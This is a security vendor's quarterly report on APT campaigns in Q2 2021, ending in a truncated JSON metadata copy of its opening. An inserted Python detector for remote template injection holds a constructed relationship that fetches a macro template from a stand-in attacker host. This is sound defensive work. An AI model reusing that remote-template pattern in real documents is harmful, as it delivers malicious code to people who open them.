
For more than four years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.
This is our latest installment, focusing on activities that we observed during Q2 2021.
Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).
## The most remarkable findings
Investigating the recent Microsoft Exchange vulnerabilities, we and our colleagues from AMR found an attacker deploying a previously unknown backdoor, "FourteenHi", in a campaign that we dubbed ExCone, active since mid-March. During our investigation we uncovered multiple tools and variants of FourteenHi, configured with infrastructure that FireEye reported as being related to the UNC2643 activity cluster. Moreover, we saw ShadowPad detections coincide with FourteenHi variant infections, possibly hinting at a shared operator between these two malware families.
FourteenHi abuses the popular VLC media player to execute its loader. It is capable of performing basic backdoor functions. Further investigation also revealed scripts used by the actor to gain situational awareness post-exploitation, as well as previous use of the infrastructure to operate Cobalt Strike Beacon.
Although we couldn't directly attribute this activity to any known threat actor, we found older, highly similar 64-bit samples of the backdoor used in close proximity with ShadowPad malware, mostly known for its operations involving supply-chain attacks as an infection vector. Notably, we also found one C2 IP used in a 64-bit sample reportedly used in the UNC2643 activity set, associated with the HAFNIUM threat actor, also using Cobalt Strike, DLL side-loading and exploiting the same Exchange vulnerabilities.
## Russian-speaking activity
On May 27 and 28, details regarding an ongoing email campaign against diplomatic entities throughout Europe and North America were released by Volexity and Microsoft. These attacks were attributed to Nobelium and APT29 by Microsoft and Volexity respectively. While we were able to verify the malware and possible targeting for this cluster of activity, we haven't been able to make a definitive assessment at this time about which threat actor is responsible, although we found ties to Kazuar. We have designated it as a new threat actor and named it "HotCousin". The attacks began with a spear-phishing email which led to an ISO file container being stored on disk and mounted. From here, the victim was presented with a LNK file made to look like a folder within an Explorer window. If the victim double-clicked on it, the LNK then executed a loader written in .NET referred to as BoomBox, or a DLL. The execution chain ultimately ended with a Cobalt Strike beacon payload being loaded into memory. According to public blogs, targeting was widespread but focused primarily on diplomatic entities throughout Europe and North America: based on the content of the lure documents bundled with the malware, this assessment appears to be accurate. This cluster of activity was conducted methodically beginning in January with selective targeting and a slow operational pace, then ramping up and ending in May. There are indications of previous activity from this threat actor dating back to at least October 2020, based on other Cobalt Strike payloads and loaders bearing similar toolmarks.
## Chinese-speaking activity
While investigating a recent rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. This cluster stood out because it used a formerly unknown Windows kernel mode rootkit and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers. The former is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open source project named "Cheat Engine" to bypass the Windows Driver Signature Enforcement mechanism. We were able to determine that this toolset had been in use from as early as July 2020; and that the threat actor was mostly focused on Southeast Asian targets, including several governmental entities and telecoms companies. Since this was a long-standing operation, with high-profile victims, an advanced toolset and no affinity to a known threat actor, we decided to name the underlying cluster "GhostEmperor".
APT31 (aka ZIRCONIUM) is a Chinese-speaking intrusion set. This threat actor set up an ORB (Operational Relay Boxes) infrastructure, composed of several compromised SOHO routers, to target entities based in Europe (and perhaps elsewhere). As of the publication of our report in May, we had seen these ORBs used to relay Cobalt Strike communications and for anonymization proxying purposes. It is likely that APT31 uses them for other implants and purposes as well (for example, exploit or malware staging). Most of the infrastructure put in place by APT31 comprises compromised Pakedge routers (RK1, RE1 and RE2). This little-known manufacturer specializes in small enterprise routers and network devices. So far, we don't know which specific vulnerability has been exploited by the intrusion set to compromise the routers. Nor do we currently possess telemetry that would provide further visibility into this campaign. We will, of course, continue to track these activities.
Following our previous report on EdwardsPheasant, DomainTools and BitDefender published articles about malicious activities against targets in Southeast Asia which we believe, with medium to high confidence, are parts of EdwardsPheasant campaigns. While tracking the activities of this threat actor, analyzing samples discovered or provided by third parties, and investigating from public IoCs, we discovered an updated DropPhone implant, an additional implant loaded by FoundCore's shellcode, several possible new infection documents and malicious domain names, as well as additional targets. While we do not believe we have a complete picture of this set of activities yet, our report this quarter marks a significant step further in understanding its extent.
A Chinese-speaking APT compromised a certificate authority in Mongolia and replaced digital certificate management client software with a malicious downloader in February. We are tracking this group as BountyGlad. Related infrastructure was identified and used in multiple other incidents: interesting related activity included server-side attacks on WebSphere and WebLogic services in Hong Kong; and on the client-side, Trojanized Flash Player installers. The group demonstrated an increase in strategic sophistication with this supply-chain attack. While replacing a legitimate installer on a high value website like a certificate authority requires a medium level of skill and coordination, the technical sophistication is not on par with ShadowHammer. And while the group deploys fairly interesting, but simplistic, steganography to cloak its shellcode, we think it was probably generated with code that has been publicly available for years. Previous activity also connected with this group relied heavily on spear-phishing and Cobalt Strike throughout 2020. Some activity involved PowerShell commands and loader variants different from the downloaders presented in our recent report. In addition to spear-phishing, the group appears to rely on publicly available exploits to penetrate unpatched target systems. They use implants and C2 (Command and Control) code that are a mix of both publicly available and privately shared across multiple Chinese-speaking APTs. We are able to connect infrastructure across multiple incidents. Some of those were focused on Western targets in 2020. Some of the infrastructure listed in an FBI Flash alert published in May 2020, targeting US organizations conducting COVID-19 research, was also used by BountyGlad.
While investigating users infected with the TPCon backdoor, previously discussed in a private report, we detected loaders which are part of a new multi-plugin malware framework that we named "QSC", which allows attackers to load and run plugins in-memory. We attribute the use of this framework to Chinese-speaking groups, based on some overlaps in victimology and infrastructure with other known tools used by these groups. We have so far observed the malware loading a Command shell and File Manager plugins in-memory. We believe the framework has been used in the wild since April 2020, based on the compilation timestamp of the oldest sample found. However, our telemetry suggests that the framework is still in use: the latest activity we detected was in March this year.
Earlier this month, Rostelecom Solar and NCIRCC issued a joint public report describing a series of attacks against networks of government entities in Russia. The report described a formerly unknown actor leveraging an infection chain that leads to the deployment of two implants - WebDav-O and Mail-O. Those, in conjunction with other post-exploitation activity, have led to network-wide infections in the targeted organizations that resulted in exfiltration of sensitive data. We were able to trace the WebDav-O implant's activity in our telemetry to at least 2018, indicating government affiliated targets based in Belarus. Based on our investigation, we were able to find additional variants of the malware and observe some of the commands executed by the attackers on the compromised machines.
We discovered a cluster of activity targeting telecom operators within a specific region. The bulk of this activity took place from May to October 2020. This activity made use of several malware families and tools; but the infrastructure, a staging directory, and in-country target profiles tie them together. The actors deployed a previously unknown passive backdoor, which we call "TPCon", as a primary implant. It was later used both to perform reconnaissance within target organizations and to deploy a post-compromise toolset made up mostly of publicly available tools. We also found other previously unknown active backdoors, which we call "evsroin", used as secondary implants. Another interesting find was a related loader (found in a staging directory) that loaded a KABA1 implant variant. KABA1 was an implant used against targets throughout the South China Sea that we attributed to the Naikon APT back in 2016. On another note, on the affected hosts we found multiple additional malware families shared by Chinese-speaking actors, such as the ShadowPad and Quarian backdoors. These did not seem to be directly connected to the TPCon/evsroin incidents because the supporting infrastructure appeared to be completely separate. One of the ShadowPad samples appears to have been detected in 2020, while the others were detected well before that, in 2019. Besides the Naikon tie, we found some overlaps with previously reported IceFog and IamTheKing activities.
## Middle East
BlackShadow is a threat group that became known after exfiltrating sensitive documents from Shirbit, an Israeli insurance company, and demanding a ransom in exchange for not releasing the information in its possession. Since then, the group has made more headlines, breaching another company in Israel and publishing a trove of documents containing customer-related information on Telegram. Following this, we found several samples of the group's unique .NET backdoor in our telemetry that were formerly unknown to us, one of which was recently detected in Saudi Arabia. By pivoting on new infrastructure indicators that we observed in those samples, we were able to find a particular C2 server that was contacted by a malicious Android implant and shows ties to the group's activity.
We previously covered a WildPressure campaign against targets in the Middle East. Keeping track of the threat actor's malware this spring, we were able to find a newer version (1.6.1) of their C++ Trojan, a corresponding VBScript variant with the same version and a completely new set of modules, including an orchestrator and three plugins. This confirms our previous assumption that there are more last-stagers besides the C++ ones, based on one of the fields in the C2 communication protocol which contains the "client" programming language. Another language used by WildPressure is Python. The PyInstaller module for Windows contains a script named "Guard". Perhaps the most interesting finding here is that this malware was developed for both Windows and macOS operating systems. In this case, the hardcoded version is 2.2.1. The coding style, overall design and C2 communication protocol are quite recognisable across all programming languages used by the attackers. The malware used by WildPressure is still under active development in terms of versions and programming languages in use. Although we could not associate WildPressure's activity with other threat actors, we did find minor similarities in the TTPs (Tactics, Techniques and Procedures) used by BlackShadow, which is also active in the same region. However, we consider that these similarities serve as minor ties and are not enough to make any attribution.
We discovered an ongoing campaign that we attribute to an actor named WIRTE, beginning in late 2019, targeting multiple sectors, focused on the Middle East. WIRTE is a lesser-known threat actor first publicly referenced in 2019, which we suspect has relations with the Gaza Cybergang threat actor group. During our hunting efforts in February for threat actor groups using VBS/VBA implants, we came across MS Excel droppers that use hidden spreadsheets and VBA macros to drop their first stage implant - a VBS script. The VBS script's main function is to collect system information and execute arbitrary code sent by the attackers. Although we recently reported on a new Muddywater first stage VBS implant used for reconnaissance and profiling activities, these intrusion sets have slightly different TTPs and wider targeting. To date, we have recorded victims focused in the Middle East and a few other countries outside this region. Despite various industries being affected, the focus was mainly towards government and diplomatic entities; however, we also noticed an unusual targeting of law firms.
GoldenJackal is the name we have given to a cluster of activity, recently discovered in our telemetry, that has been active since November 2019. This intrusion set consists of a set of .NET-based implants that are intended to control victim machines and exfiltrate certain files from them, suggesting that the actor's primary motivation is espionage. Furthermore, the implants were found in a restricted set of machines associated with diplomatic entities in the Middle East. Analysis of the aforementioned malware, as well as the accompanied detection logs, portray a capable and moderately stealthy actor. This can be substantiated by the successful foothold gained by the underlying actor in the few organizations we came across, all the while keeping a low signature and ambiguous footprint.
## Southeast Asia and Korean Peninsula
The ScarCruft group is a geopolitically motivated APT group that usually attacks government entities, diplomats and individuals associated with North Korean affairs. Following our last report about this group, we had not seen its activities for almost a year. However, we observed that ScarCruft compromised a North Korea-related news media website in January, beginning a campaign that was active until March. The attackers utilized the same exploit chains, CVE-2020-1380 and CVE-2020-0986, also used in [Operation Powerfall](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>). Based on the exploit code and infection scheme characteristics, we suspect that Operation PowerFall has a connection with the ScarCruft group. The exploit chain contains several stages of shellcode execution, finally deploying a Windows executable payload in memory. We discovered several victims from South Korea and Singapore. Besides this watering-hole attack, this group also used Windows executable malware concealing its payload. This malware, dubbed "ATTACK-SYSTEM", also used multi-stage shellcode infection to deliver the same final payload named "BlueLight". BlueLight uses OneDrive for C2. Historically, ScarCruft malware, especially RokRat, took advantage of personal cloud servers as C2 servers, such as pCloud, Box, Dropbox, and Yandex.
In May 2020, the Criminal Investigation Bureau (CIB) of Taiwan published an announcement about an attack targeting Taiwanese legislators. Based on their information, an unknown attacker sent spear-phishing emails using a fake presidential palace email account, delivering malware we dubbed "Palwan". Palwan is malware capable of performing basic backdoor functionality as well as downloading further modules with additional capabilities. Analysing the malware, we discovered another campaign, active in parallel, targeting Nepal. We also found two more waves of attacks launched against Nepal in October 2020 and in January this year using Palwan malware variants. We suspect that the targeted sector in Nepal is similar to the one reported by the CIB of Taiwan. Investigating the infrastructure used in the Nepal campaigns, we spotted an overlap with Dropping Elephant activity. However, we don't deem this overlap sufficient to attribute this activity to the Dropping Elephant threat actor.
BlueNoroff is a long-standing, financially motivated APT group that has been targeting the financial industry for years. In recent operations, the group has focused on cryptocurrency businesses. Since the publication of our research on BlueNoroff's "SnatchCrypto" campaign in 2020, the group's strategy to deliver malware has evolved. In this campaign, BlueNoroff used a malicious Word document exploiting CVE-2017-0199, a remote template injection vulnerability. The injected template contains a Visual Basic script, which is responsible for decoding the next payload from the initial Word document and injecting it into a legitimate process. The injected payload creates a persistent backdoor on the victim's machine. We observed several types of backdoor. For further surveillance of the victim, the malware operator may also deploy additional tools. BlueNoroff has notably set up fake blockchain, or cryptocurrency-related, company websites for this campaign, to lure potential victims and initiate the infection process. Numerous decoy documents were used, which contain business and nondisclosure agreements as well as business introductions. When compared to the previous SnatchCrypto campaign, the BlueNoroff group utilized a similar backdoor and PowerShell agent but changed the initial infection vector. Windows shortcut files attached to spear-phishing emails used to be the starting point for an infection: they have now been replaced by weaponized Word documents.
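A remote template injection document carries no macro itself: the attached-template relationship in the .docx package points at an external URL, and Word fetches that template (and its VBA) when the file is opened. The following detector, added here as an illustration and not code from Kaspersky or from the campaign, inspects the relationship files of a .docx for external attachedTemplate or oleObject targets that point at a web or UNC location; the sample document and the attacker.example host are constructed for the demonstration.

```python
"""Flag .docx files whose relationships pull a template or OLE object
from a remote location (the delivery pattern described above).
Added example; the sample document below is constructed, not a real lure."""
import io
import re
import sys
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Relationship types that make Word fetch content automatically on open.
RISKY_TYPES = {OFFICE_REL + "attachedTemplate", OFFICE_REL + "oleObject"}
# Relationship files where such links live (settings.xml carries the attached template).
RELS_TO_CHECK = ("word/_rels/settings.xml.rels", "word/_rels/document.xml.rels")
# A remote target is http(s) or a UNC path; local file:/// templates are normal.
REMOTE_TARGET = re.compile(r"(?i)^(https?:|\\\\)")


def find_remote_templates(docx_bytes: bytes) -> list:
    """Return (rels_path, rel_id, target) for every external, remote
    attachedTemplate/oleObject relationship found in the package."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        names = set(zf.namelist())
        for rels_path in RELS_TO_CHECK:
            if rels_path not in names:
                continue
            root = ET.fromstring(zf.read(rels_path))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                if (rel.get("Type") in RISKY_TYPES
                        and rel.get("TargetMode") == "External"
                        and REMOTE_TARGET.match(target)):
                    hits.append((rels_path, rel.get("Id"), target))
    return hits


def build_docx(settings_rels_xml: str) -> bytes:
    """Construct a minimal .docx in memory so the detector can be exercised offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/settings.xml", "<w:settings/>")
        zf.writestr("word/_rels/settings.xml.rels", settings_rels_xml)
    return buf.getvalue()


# Constructed relationship files: one fetching a template over HTTP, one pointing
# at the normal local Normal.dotm that benign documents reference.
MALICIOUS_RELS = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    f'<Relationships xmlns="{REL_NS}">'
    f'<Relationship Id="rId1" Type="{OFFICE_REL}attachedTemplate" '
    'Target="http://attacker.example/template.dotm" TargetMode="External"/>'
    '</Relationships>'
)
BENIGN_RELS = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    f'<Relationships xmlns="{REL_NS}">'
    f'<Relationship Id="rId1" Type="{OFFICE_REL}attachedTemplate" '
    'Target="file:///C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" '
    'TargetMode="External"/>'
    '</Relationships>'
)


if __name__ == "__main__":
    # Usage: python detector.py file1.docx file2.docx ...
    paths = sys.argv[1:]
    for path in paths:
        with open(path, "rb") as fh:
            for rels_path, rel_id, target in find_remote_templates(fh.read()):
                print(f"{path}: {rels_path} {rel_id} -> {target}")
    if not paths:
        print("constructed sample:", find_remote_templates(build_docx(MALICIOUS_RELS)))
```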
We have discovered [Andariel activity](<https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/>) using a revised infection scheme and custom ransomware targeting a broad spectrum of industries located in South Korea. In April, we observed a suspicious document containing a Korean file name and decoy uploaded to VirusTotal. It revealed a novel infection scheme and an unfamiliar payload. During the course of our research, Malwarebytes published a report with technical details about the same series of attacks, which attributed it to the Lazarus group. After a deep analysis we reached a different conclusion - that the Andariel group was behind these attacks. Code overlaps between the second stage payload in this campaign and previous malware from the Andariel group allowed for this attribution. Apart from the code similarity and the victimology, we found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity. The threat actor has been spreading the third stage payload since the middle of 2020 and leveraged malicious Word documents and files mimicking PDF documents as infection vectors. Notably, in addition to the final backdoor, we discovered one victim infected with custom ransomware. This ransomware adds another facet to this Andariel campaign, which also sought financial profit in a previous operation involving the compromise of ATMs.
We recently uncovered a large-scale and highly active attack in Southeast Asia coming from a threat actor we dubbed [LuminousMoth](<https://securelist.com/apt-luminousmoth/103332/>). Further analysis revealed that this malicious activity dates back to October 2020 and was still ongoing at the time we reported it in June. LuminousMoth takes advantage of DLL sideloading to download and execute a Cobalt Strike payload. However, perhaps the most interesting part of this attack is its capability to spread to other hosts by infecting USB drives. In addition to the malicious DLLs, the attackers also deployed a signed, but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate files; and an additional tool that accesses a victim's Gmail session by stealing cookies from the Chrome browser. Infrastructure ties as well as shared TTPs allude to a possible connection between LuminousMoth and the HoneyMyte threat group, which was seen targeting the same region and using similar tools in the past. Most early sightings of this activity were in Myanmar, but it now appears that the attackers are much more active in the Philippines, where the number of known attacks has grown more than tenfold. This raises the question of whether this is caused by a rapid replication through removable devices or by an unknown infection vector, such as a watering-hole focusing on the Philippines.
We recently reported SideCopy campaigns attacking the Windows platform together with Android-based implants. These implants turned out to be multiple applications working as information stealers to collect sensitive information from victims' devices, such as contact lists, SMS messages, call recordings, media and other types of data. Following up, we discovered additional malicious Android applications, some of them purporting to be known messaging apps like Signal or an adult chat platform. These newly discovered applications use the Firebase messaging service as a channel to receive commands. The operator is able to control whether Dropbox or another, hard-coded server is used to exfiltrate stolen files.
## Other interesting discoveries
Expanding our research on the exploit targeting CVE-2021-1732, originally discovered by DBAPPSecurity Threat Intelligence Center and used by the Bitter APT group, [we discovered another possible zero-day exploit used in the Asia-Pacific (APAC) region](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>). Interestingly, the exploit was found in the wild as part of a separate framework, alongside CVE-2021-1732 as well as other previously patched exploits. We are highly confident that this framework is entirely unrelated to Bitter APT and was used by a different threat actor. Further analysis revealed that this Escalation of Privilege (EoP) exploit has potentially been used in the wild since at least November 2020. Upon discovery, we reported this new exploit to Microsoft in February. After confirmation that we were indeed dealing with a new zero-day, it received the designation CVE-2021-28310.
Various marks and artifacts left in the exploit mean that we are also highly confident that CVE-2021-1732 and CVE-2021-28310 were created by the same exploit developer that we track as "Moses". "Moses" appears to be an exploit developer who makes exploits available to several threat actors, based on other past exploits and the actors observed using them. To date, we have confirmed that at least two known threat actors have utilized exploits originally developed by Moses: Bitter APT and Dark Hotel. Based on similar marks and artifacts, as well as privately obtained information from third parties, we believe at least six vulnerabilities observed in the wild in the last two years have originated from "Moses". While the EoP exploit was discovered in the wild, we are currently unable to directly tie its usage to any known threat actor that we are currently tracking. The EoP exploit was probably chained together with other browser exploits to escape sandboxes and obtain system level privileges for further access. Unfortunately, we weren't able to capture a full exploit chain, so we don't know if the exploit is used with another browser zero-day, or coupled with exploits taking advantage of known, patched vulnerabilities.
In another, more recent investigation into the surge of attacks by APT actors against Exchange servers following the revelation of ProxyLogon and other Exchange vulnerabilities, we took note of one unique cluster of activity. It attracted our attention because the actor behind it seemed to have been active in compromising Exchange servers since at least December 2020, all the while using a toolset that we were not able to associate with any known threat group. During March, several waves of attacks on Exchange servers were made public, partially describing the same cluster of activity that we had observed. One of them, reported by ESET, contained an assessment that the actor behind this activity had access to the Exchange exploits prior to their public release, which aligns with our observations of its early activity last year. That said, none of the public accounts described sightings of the full infection chain and later stages of malware deployed as part of this group's operation. Adopting the name Websiic, given publicly to this cluster of activity by ESET, we reported the TTPs of the underlying threat actor. Namely, we focused on the usage of both commodity tools like the China Chopper webshell and a proprietary .NET backdoor used by the group, which we dubbed "Samurai", as well as describing a broader set of targets than the one documented thus far.
On 15 April, Codecov publicly disclosed that its Bash Uploader script had been compromised and was distributed to users between 31 January and 1 April. The Bash Uploader script is publicly distributed by Codecov and aims to gather information on the user's execution environments, collect code coverage reports, and send them to the Codecov infrastructure. As a result, this script compromise effectively constitutes a supply-chain attack. The Bash Uploader script is typically executed as a trusted resource in development and testing environments (including as part of automated build processes, such as continuous integration or development pipelines); and its compromise could enable malicious access to infrastructure or account secrets, as well as code repositories and source code. While we haven't been able to confirm the malicious script deployment, retrieve any information on the compromise goals, or identify further associated malicious tools yet, we were able to collect one sample of a compromised Bash Uploader script, as well as identify some possibly associated additional malicious servers.
An e-mail sent by Click Studios to its customers on 22 April informed them that a sophisticated threat actor had gained access to the Passwordstate automatic updating functionality, referred to as the in-place upgrade. Passwordstate is a password management tool for enterprises, and on 20 April, for a period of about 28 hours, a malicious DLL was included in the software updates. On 24 April, an incident management advisory was also released. The purpose of the campaign was to steal passwords stored in the password manager. Although this attack was only active for a short time, we managed to obtain the malicious DLLs and reported our initial findings. Nevertheless, it's still unclear how the attackers gained access to the Passwordstate software to begin with. Following a new advisory published by Click Studios on 28 April, we discovered a new variant of the malicious DLL used to backdoor the Passwordstate password manager. This DLL variant was distributed in a phishing campaign, most likely by the same actor.
A few days after April's Patch Tuesday updates from Microsoft (13 April), a number of suspicious files caught our attention. These files were binaries, disguised as "April 2021 Security Update Installers". They were signed with a valid digital signature, delivering Cobalt Strike beacon modules. It is likely that the modules were signed with a stolen digital certificate. These Cobalt Strike beacon implants were configured with a hardcoded C2, "code.microsoft.com". Contrary to a (now redacted) publication from the Qihoo 360 team revolving around this activity, we can confirm that there was no compromise of Microsoft's infrastructure. In fact, an unauthorized party took over the dangling subdomain "code.microsoft.com" and configured it to resolve to their Cobalt Strike host, set up around 15 April. That domain hosted a Cobalt Strike beacon payload served to HTTP clients using a specific and unique user agent. According to Microsoft and the initial Qihoo notification, the impact in this case was very limited and didn't affect unsuspecting visitors to this website because of the required unique user agent.
On April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. The EoP exploit was fine-tuned to work against the latest and the most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2) and it exploits two distinct vulnerabilities in the Microsoft Windows OS kernel. On April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday. The exploit chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a "remote shell"-style backdoor which in turn connects to the C2 to get commands. So far, we haven't been able to find any connections or overlaps with a known actor. Therefore, we are tentatively calling this cluster of activity [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).
On April 16, we began hearing rumors about active exploitation of Pulse Secure devices from other researchers in the community. One day prior to this, the NSA, CISA, and FBI had jointly published an advisory stating that APT29 was conducting widespread scanning and exploitation of vulnerable systems, including Pulse Secure. For this reason, initial thoughts were that the two were related; and these were just rumors circulating the community about old activity that was being brought to light again. Following this, we were able to at least confirm that the initial rumors were part of a separate set of activities that had occurred between January and March and were not directly related to the advisory mentioned above. This new activity involved the exploitation of at least two vulnerabilities in Pulse Secure; one previously patched and one zero-day (CVE-2021-22893). We also became aware of affected organizations that were notified by a third party that they were potentially compromised by this activity. After exploitation, the threat actor proceeded to deploy a simple webshell to maintain persistence. On May 3, Pulse Secure delivered "out-of-cycle" update and workaround packages to provide a solution for the multiple vulnerabilities.
Cooperating with Check Point Research, we discovered an ongoing attack targeting a small group of individuals in Xinjiang and Pakistan, in regions mostly populated by the Uyghur minority. The attackers used malicious executables that collect information about the infected system and attempt to download a second-stage payload. The actor put considerable effort into disguising the payloads, whether by creating delivery documents that appear to be originating from the United Nations using up-to-date related themes, or by setting up websites for non-existing organizations claiming to fund charity groups. In our report, we examined the flow of both infection vectors and provided our analysis of the malicious artifacts we came across during this investigation, even though we were unable to obtain the later stages of the infection chain.
## Final thoughts
While the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organisation or compromising an individual's device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.
Here are the main trends that we've seen in Q2 2021:
* We have reported several supply-chain attacks in recent months.. While some were major and have attracted worldwide attention, we observed equally successful low-tech attacks, such as BountyGlad, CoughingDown and the attack targeting Codecov.
* APT groups mainly use social engineering to gain an initial foothold in a target network. However, we've seen a rise in APT threat actors leveraging exploits to gain that initial foothold - including the zero-days developed by the exploit developer we call "Moses" and those used in the PuzzleMaker, Pulse Secure attacks and the Exchange server vulnerabilities.
* APT threat actors typically refresh and update their toolsets: this includes not only the inclusion of new platforms but also the use of additional languages as seen by WildPressure's macOS-supported Python malware.
* As illustrated by the campaigns of various threat actors - including BountyGlad, HotCousin, GoldenJackal, Scarcruft, Palwan, Pulse Secure and the threat actor behind the WebDav-O/Mail-O implants - geo-politics continues to drive APT developments.
As always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.
{"id": "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "type": "securelist", "bulletinFamily": "blog", "title": "APT trends report Q2 2021", "description": "\n\nFor more than four years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q2 2021.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nInvestigating the recent Microsoft Exchange vulnerabilities we and our colleagues from AMR found an attacker deploying a previously unknown backdoor, "FourteenHi", in a campaign that we dubbed ExCone, active since mid-March. During our investigation we revealed multiple tools and variants of FourteenHi, configured with infrastructure that FireEye reported as being related to the UNC2643 activity cluster. Moreover, we saw ShadowPad detections coincide with FourteenHi variant infections, possibly hinting at a shared operator between these two malware families.\n\nFourteenHi abuses the popular VLC media player to execute its loader. It is capable of performing basic backdoor functions. 
Further investigation also revealed scripts used by the actor to gain situational awareness post-exploitation, as well as previous use of the infrastructure to operate Cobalt Strike Beacon.\n\nAlthough we couldn't directly attribute this activity to any known threat actor, we found older, highly similar 64-bit samples of the backdoor used in close proximity with ShadowPad malware, mostly known for its operations involving supply-chain attacks as an infection vector. Notably, we also found one C2 IP used in a 64-bit sample reportedly used in the UNC2643 activity set, associated with the HAFNIUM threat actor, also using Cobalt Strike, DLL side-loading and exploiting the same Exchange vulnerabilities.\n\n## Russian-speaking activity\n\nOn May 27 and 28, details regarding an ongoing email campaign against diplomatic entities throughout Europe and North America were released by Volexity and Microsoft. These attacks were attributed to Nobelium and APT29 by Microsoft and Volexity respectively. While we were able to verify the malware and possible targeting for this cluster of activity, we haven't been able to make a definitive assessment at this time about which threat actor is responsible, although we found ties to Kazuar. We have designated it as a new threat actor and named it "HotCousin". The attacks began with a spear-phishing email which led to an ISO file container being stored on disk and mounted. From here, the victim was presented with a LNK file made to look like a folder within an Explorer window. If the victim double clicked on it, the LNK then executed a loader written in .NET referred to as BoomBox, or a DLL. The execution chain ultimately ended with a Cobalt Strike beacon payload being loaded into memory. According to public blogs, targeting was widespread but focused primarily on diplomatic entities throughout Europe and North America: based on the content of the lure documents bundled with the malware, this assessment appears to be accurate. 
This cluster of activity was conducted methodically beginning in January with selective targeting and slow operational pace, then ramping up and ending in May. There are indications of previous activity from this threat actor dating back to at least October 2020, based on other Cobalt Strike payloads and loaders bearing similar toolmarks.\n\n## Chinese-speaking activity\n\nWhile investigating a recent rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. This cluster stood out because it used a formerly unknown Windows kernel mode rootkit and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers. The former is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open source project named "Cheat Engine" to bypass the Windows Driver Signature Enforcement mechanism. We were able to determine that this toolset had been in use from as early as July 2020; and that the threat actor was mostly focused on Southeast Asian targets, including several governmental entities and telecoms companies. Since this was a long-standing operation, with high-profile victims, an advanced toolset and no affinity to a known threat actor, we decided to name the underlying cluster "GhostEmperor".\n\nAPT31 (aka ZIRCONIUM) is a Chinese-speaking intrusion set. This threat actor set up an ORB (Operational Relay Boxes) infrastructure, composed of several compromised SOHO routers, to target entities based in Europe (and perhaps elsewhere). As of the publication of our report in May, we had seen these ORBs used to relay Cobalt Strike communications and for anonymization proxying purposes. It is likely that APT31 uses them for other implants and ends as well (for example, exploit or malware staging). 
Most of the infrastructure put in place by APT31 comprises compromised Pakedge routers (RK1, RE1 and RE2). This little-known constructor specializes in small enterprise routers and network devices. So far, we don't know which specific vulnerability has been exploited by the intrusion set to compromise the routers. Nor do we currently possess telemetry that would provide further visibility into this campaign. We will, of course, continue to track these activities.\n\nFollowing our previous report on EdwardsPheasant, DomainTools and BitDefender published articles about malicious activities against targets in Southeast Asia which we believe, with medium to high confidence, are parts of EdwardsPheasant campaigns. While tracking the activities of this threat actor, analyzing samples discovered or provided by third parties, and investigating from public IoCs, we discovered an updated DropPhone implant, an additional implant loaded by FoundCore's shellcode, several possible new infection documents and malicious domain names, as well as additional targets. While we do not believe we have a complete picture of this set of activities yet, our report this quarter marks a significant step further in understanding its extent.\n\nA Chinese-speaking APT compromised a certificate authority in Mongolia and replaced digital certificate management client software with a malicious downloader in February. We are tracking this group as BountyGlad. Related infrastructure was identified and used in multiple other incidents: interesting related activity 